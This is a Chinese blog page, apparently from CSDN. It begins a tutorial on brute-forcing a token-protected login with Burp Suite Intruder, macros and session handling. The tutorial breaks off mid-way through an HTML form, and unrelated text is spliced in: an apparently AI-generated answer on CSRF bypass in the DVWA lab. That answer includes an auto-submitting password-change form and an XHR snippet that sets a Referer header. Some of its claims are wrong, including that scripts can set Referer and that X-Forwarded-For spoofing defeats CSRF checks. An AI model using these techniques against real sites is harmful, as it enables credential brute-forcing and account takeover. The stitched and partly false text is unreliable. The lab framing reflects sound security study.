前端 token-防爆破(CSRF Token Bypass)-burpsuit

本文介绍了如何利用BurpSuite的Intruder模块,特别是Pitchfork攻击类型,配合宏和会话处理规则,对前端页面中的登录Token进行爆破。步骤包括捕获请求、设置攻击范围、构建宏以更新session和loginToken值,最后载入字典进行攻击尝试。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

知识点:利用 burpsuite 循环把前端页面上的 token 值加到登录的 token 上。

前端页面:

<form method="POST">
    <div class="form-floating mb-3">
        <input class="form-control" type="text" name=username  placeholder
在DVWA(Damn Vulnerable Web Application)靶场中,绕过CSRF(跨站请求伪造)保护的一种常见方法是修改请求头。以下是一些常见的方法: 1. **修改Referer头**: CSRF保护机制通常会验证请求的Referer头,以确保请求来自合法的页面。可以通过修改Referer头为一个受信任的地址来绕过这种保护。 2. **使用X-Forwarded-For头**: 某些应用程序会使用X-Forwarded-For头来获取客户端的真实IP地址。通过修改这个头,可以欺骗服务器,使其认为请求来自受信任的IP地址。 3. **添加自定义头**: 有些应用程序会检查自定义头,例如X-Requested-With或Authorization头。通过添加这些头并赋予适当的值,可以绕过CSRF保护。 4. **使用相同的域名**: 如果应用程序只允许来自特定域名的请求,可以通过在攻击页面中使用相同的域名(例如通过子域)来绕过CSRF保护。 以下是一个简单的示例,展示了如何通过修改Referer头来绕过CSRF保护: ```html <!DOCTYPE html> <html> <head> <title>CSRF Bypass Example</title> </head> <body> <form action="http://dvwa.example.com/vulnerabilities/csrf/" method="GET"> <input type="hidden" name="password_new" value="newpassword"> <input type="hidden" name="password_conf" value="newpassword"> <input type="hidden" name="Change" value="Change"> <input type="hidden" name="user_token" value="your_token_here"> </form> <script> document.forms[0].submit(); </script> </body> </html> ``` 在这个示例中,攻击者通过修改HTML表单并使用JavaScript自动提交表单来绕过CSRF保护。为了进一步增强攻击效果,攻击者可以修改HTTP请求头,例如Referer头: ```javascript var xhr = new XMLHttpRequest(); xhr.open("GET", "http://dvwa.example.com/vulnerabilities/csrf/", true); xhr.setRequestHeader("Referer", "http://trusted.example.com/"); xhr.send(); ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值